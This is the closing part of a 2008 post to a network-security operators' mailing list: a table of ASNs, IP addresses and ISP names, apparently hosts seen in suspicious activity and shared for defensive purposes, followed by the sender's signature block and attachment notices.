33139 | 67.204.53.152 | CANACA-210 - Canaca-com Inc.
33139 | 67.204.53.152 | CANACA-210 - Canaca-com Inc.
33139 | 67.204.53.152 | CANACA-210 - Canaca-com Inc.
33287 | 68.37.67.27 | DNEO-OSP4 - Comcast Cable Communications, Inc.
33287 | 69.142.43.230 | DNEO-OSP4 - Comcast Cable Communications, Inc.
33287 | 71.58.236.251 | DNEO-OSP4 - Comcast Cable Communications, Inc.
33491 | 67.184.18.83 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.212.22.36 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.229.68 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.229.68 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.229.68 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.229.68 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.229.68 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.229.68 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33491 | 98.214.229.68 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33651 | 67.180.101.6 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33651 | 71.195.116.119 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33653 | 98.225.77.233 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33667 | 68.58.191.70 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33667 | 68.58.191.70 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33667 | 68.58.191.70 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33667 | 68.58.191.70 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33667 | 68.58.191.70 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33668 | 24.11.195.122 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33668 | 24.11.195.122 | DNEO-OSP7 - Comcast Cable Communications, Inc.
33668 | 68.40.127.101 | DNEO-OSP7 - Comcast Cable Communications, Inc.
35362 | 194.187.56.249 | BEST Best ISP
37960 | 120.129.72.169 | CNNIC-TRUESTARNET-AP Shanghai OneTong Com. Ltd.
37960 | 120.129.72.169 | CNNIC-TRUESTARNET-AP Shanghai OneTong Com. Ltd.
37960 | 120.129.72.169 | CNNIC-TRUESTARNET-AP Shanghai OneTong Com. Ltd.
37960 | 120.129.72.169 | CNNIC-TRUESTARNET-AP Shanghai OneTong Com. Ltd.
37960 | 120.129.72.169 | CNNIC-TRUESTARNET-AP Shanghai OneTong Com. Ltd.
37960 | 120.129.72.169 | CNNIC-TRUESTARNET-AP Shanghai OneTong Com. Ltd.
43234 | 92.16.198.81 | CPWBBSERV-AS Carphone Warehouse Broadband
Services
43234 | 92.16.198.81 | CPWBBSERV-AS Carphone Warehouse Broadband
Services
43234 | 92.8.101.165 | CPWBBSERV-AS Carphone Warehouse Broadband
Services
44038 | 62.203.77.61 | BLUEWIN-AS Swisscom Fixnet AG
44038 | 85.5.70.102 | BLUEWIN-AS Swisscom Fixnet AG
- --
Brian Epstein <bepstein at ias.edu> +1 609-734-8179
Network and Security Officer Institute for Advanced Study
Key fingerprint = 128A 38F4 4CFA 5EDB 99CE 4734 6117 4C25 0371 C12A
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org
iD8DBQFI7Px6YRdMJQNxwSoRAv/+AKC7cvI2Qhy+NM29sTX3o8xmz3bdLgCfdEVs
HnQhB5EoorO0AhXFkLSijOA=
=ncMl
-----END PGP SIGNATURE-----
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: declare_ips_asns.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20081008/537e3171/attachment-0001.txt>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3296 bytes
Desc: S/MIME Cryptographic Signature
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20081008/537e3171/attachment-0001.bin>
More information about the nsp-security
mailing list